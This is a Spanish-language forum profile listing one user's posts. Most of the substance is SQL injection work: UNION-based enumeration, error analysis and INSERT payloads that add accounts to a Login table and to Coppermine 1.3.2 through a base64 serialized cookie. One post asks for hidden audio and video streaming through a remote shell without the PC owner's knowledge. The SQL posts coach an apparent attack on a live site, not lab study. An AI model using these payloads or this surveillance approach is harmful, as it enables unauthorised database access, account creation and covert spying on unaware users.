Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - jujaLVP

#1
hola gente:

Queria saber como tengo que convertir un video con aspecto widescreen  avi a mpeg2 para que al verlo en un TV se vea todo el video y no una parte, cuando le doy zoom 1/2 se ve el video entero.

Use MEncoder para convertir el avi.

saludos
#2
Electrónica / Voltaje de este proycto
24 Enero 2007, 01:24 AM
hola gente:

Tngo intenciones de hacer un "dimmer al tacto" pero en el diagrama que encontre no dice el voltaje que necesita para funcionar y algunos componentes tienen 400v pero otros solo 25.
Queria saber si alguien me pude decir a que voltaje opera el circuito, aca les dejo el link:
http://apuntes.rincondelvago.com/circuito_dimmer-al-tacto.html


saludos.
#3
Multimedia / Streaming de audio y video(oculto)
27 Septiembre 2006, 04:11 AM
hola gente

Queria saber si alguien conoce algun soft para hacer streaming de audio y video pero que no muestre nada en pantalla, que sea por linea de comando.

La idea es mediante una shell remota que tengo poder activar el streaming de audio y video sin que el usuario de la pc se entere.


saludos
#4
 hola gente, tengo un problema:

necesito si o si que el vncviewer se pueda conectar a localhost, porque estoy desarrollando una aplicacion que me permite conectarme a una pc detras de un router con NAT. Lo que yo intento hacer conectarme con el vncviewer a mi aplicacion (la que redirecciona el stream hasta la pc detras del router) y no a un vncserver directo pero cuando intento hacerlo el vncviewer me dice que no acepta conexiones locales.

alguien sabe como cambiar esto?


saludos
#5
Nivel Web / Re: SQL Injeccion- Pregunta
28 Junio 2005, 03:37 AM
leete esto:
Tecnicas de SQL injection:Un repaso

de Hernan Racciatti
http://www.hernanracciatti.com.ar

a mi me sirvio de mucho

saludos
#6
Nivel Web / Re: SQL Injeccion- Pregunta
28 Junio 2005, 01:44 AM
veamos..
Citar
' UNION SELECT SUM(Store_ID) FROM Login--

me dio como resultado:

Código:
The sum or average aggregate operation cannot take a varchar data type as an argument.
gracias a ese error te das cuenta que el campo "Store_ID" es de tipo "varchar" o sea cadena de caracteres mas comunmente llamada "string" y que aunque un string pueda contener numeros no se pueden utilizar en funciones como el "SUM" que admiten enteros como argumento.


CitarEl error que me da al tratar de agregar un usuario es :
Código:
Insert Error: Column name or number of supplied values does not match table definition.
es probable que te de este error se deba a que no estas insertando valores en todos los campos que posee la tabla,pero no estoy muy seguro al respecto.


Citarcuando puse '; insert into Login values (vcore, pass, 0xffff)--

(osea lo mismo pero sin comillas)
dio como resultado:
Código:
The name 'vcore' is not permitted in this context. Only constants, expressions, or variables allowed here. Column names are not permitted.
cuando pones algo sin comillas que no sean numeros,se interpreta como una variable o como el nombre de un campo, y como no se pueden poner nombres de campos dentro del "VALUES" del "INSERT" te tira este error.

me quedo una duda, de el tercer campo de la tabla "Login" en el cual pusiste 0xffff, esta en el query original?
si esta y no es de tipo varhcar te puede ser muy util...

saludos.
#7
Nivel Web / Re: SQL Injeccion- Pregunta
25 Junio 2005, 18:54 PM
hola!

primero:en que campo haces la injecccion, Login.password¿?
segundo:antes de hacer esto:
Citar' UNION SELECT MIN(Store_ID),1,1 FROM Login WHERE Store_ID > 'a'--

deberias saber los campos del query original,

y aca

Citar
'; insert into Login values ('vcore', 'pass', 0xffff)--

creo que te da el error por las comillas,como hay varias quizas el motor de base de datos lo interpreta mal.

saca los datos que te faltan y te dot una mano.


saludos
#8
Nivel Web / Re: SQL injection complicada
10 Junio 2005, 01:22 AM
he notado que coppermine utiliza variables tipo "$CONFIG['TABLE_PICTURES']} "para referirse a las tabals en la base de datos, quizas mi codigo no tenga efecto porque yo estoy usando el nombre "default" de las tablas .
alguien sabe como puedo obtener el nombre de la tabla sabiendo que no muestra eeror alguno para guiarme...?¿


saludos
#9
Nivel Web / Re: SQL injection complicada
9 Junio 2005, 01:29 AM
el query final quedaria asi:


SELECT filepath,filename  FROM {$CONFIG['TABLE_PICTURES']} WHERE approved = 'YES'AND pid IN (;INSERT INTO cpg132_users (user_regdate,user_active, user_actkey, user_name,user_password, user_email, user_location,user_interests, user_website, user_occupation)VALUES ('0000-00-00 00:00:00', '', '','nombreusuario', 'pass', 'email@dominio.com', '','', '', '' );#)



{$CONFIG['TABLE_PICTURES']}: es el nombre de la tabla pictures"

y aca esta la pantalla del error que me tira




saludos
#10
Nivel Web / SQL injection complicada
8 Junio 2005, 02:13 AM
hola gente: estoy intentando explotar una Vulnerabilidad de SQL injection en CPG 1.3.2 que es bastante dificil, ya que el codigo sql se coloca en una cookie codificada en base64 y dentro de una estrictura formada con la funcuion php "serialize" que sirve para guardar datos y sus tipos,Les muestro el codigo del Query:

Citarif (count($FAVPICS)>0){
        $favs = implode(",",$FAVPICS);

        $select_columns = 'filepath,filename';

        $result = db_query("SELECT $select_columns FROM {$CONFIG['TABLE_PICTURES']} WHERE approved = 'YES'AND pid IN ($favs)");
        $rowset = db_fetch_rowset($result);
        foreach ($rowset as $key => $row){

                $filelist[] = $rowset[$key]['filepath'].$rowset[$key]['filename'];

        }

$FAVPICS es un arreglo que contiene numeros de id de imagenes,y se extrae drectamente de las cookies sin chequeo alguno.osea que en $favs es donde estara nuestro codigo de injeccion.

En los datos de la cookie coloque esto:

a:1:{i:0;s:282:";INSERT INTO cpg132_users (user_regdate,user_active, user_actkey, user_name,user_password, user_email, user_location,user_interests, user_website, user_occupation)VALUES ('0000-00-00 00:00:00', '', '','nombreusuario', 'pass', 'email@dominio.com', '','', '', '' );#";}

lo probe en mi servidor mysql y no me tira error alguno, funciona, pero cuando pongo esto en la cookie(codificado en base64) me dice la pagina que hay un error el procesar el query.


laguna sugerencia¿?

saludos